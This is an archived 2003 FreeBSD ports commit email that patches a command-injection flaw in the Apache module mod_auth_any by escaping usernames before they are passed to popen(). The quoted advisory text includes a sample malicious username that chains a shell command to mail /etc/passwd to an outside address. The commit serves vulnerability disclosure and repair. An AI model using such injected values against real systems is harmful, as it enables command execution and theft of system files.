Skip site navigation (1)Skip section navigation (2) 
Date:      Mon, 24 Mar 2003 20:23:11 -0800 (PST)
From:      Mario Sergio Fujikawa Ferreira <lioux@FreeBSD.org>
To:        ports-committers@FreeBSD.org, cvs-ports@FreeBSD.org, cvs-all@FreeBSD.org
Subject:   cvs commit: ports/www/mod_auth_any Makefile ports/www/mod_auth_any/files bash_single_quote_escape_string.c patch-mod_auth_any.c
Message-ID:  <200303250423.h2P4NBam096804@repoman.freebsd.org>
index | next in thread | raw e-mail 

lioux       2003/03/24 20:23:11 PST

  FreeBSD ports repository

  Modified files:
    www/mod_auth_any     Makefile 
  Added files:
    www/mod_auth_any/files bash_single_quote_escape_string.c 
                           patch-mod_auth_any.c 
  Log:
  o Fix vulnerability that allows execution of arbitrary commands on
    the server with the uid of the apache process. Background [1]:
  
  "The module accepts a username and password from the web client,
  passes them to a user-space executable (using popen(3), which invokes
  a shell) and waits for a response in order to authenticate the user.
  The password is quoted on the popen() command line to avoid
  interpretation of shell special chars, but the username is not.
  Thus a malicious user can execute commands by supplying an appropriately
  crafted username. (e.g. "foo&mail me@my.home</etc/passwd")
  
  "The problem is easily fixed by adding quotes (and escaping any
  quotes already present) to the username and password in the popen
  command line."
  
  o Fix this by adding a escaping function from [2]. Then, modifying
    this function appropriately with ideas from [3]. Apply the new
    escaping code to mod_auth_any.
  o Bump PORTREVISION
  
  Submitted by:   Security Officer (nectar),
                  Red Hat Security Response Team <security@redhat.com> [1]
  Obtained from:  mod_auth_any CVS [2],
                  nalin@redhat.com [3]
  
  Revision  Changes    Path
  1.6       +5 -0      ports/www/mod_auth_any/Makefile
  1.1       +45 -0     ports/www/mod_auth_any/files/bash_single_quote_escape_string.c (new)
  1.1       +37 -0     ports/www/mod_auth_any/files/patch-mod_auth_any.c (new)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe cvs-all" in the body of the message
home | help

Want to link to this message? Use this
URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200303250423.h2P4NBam096804>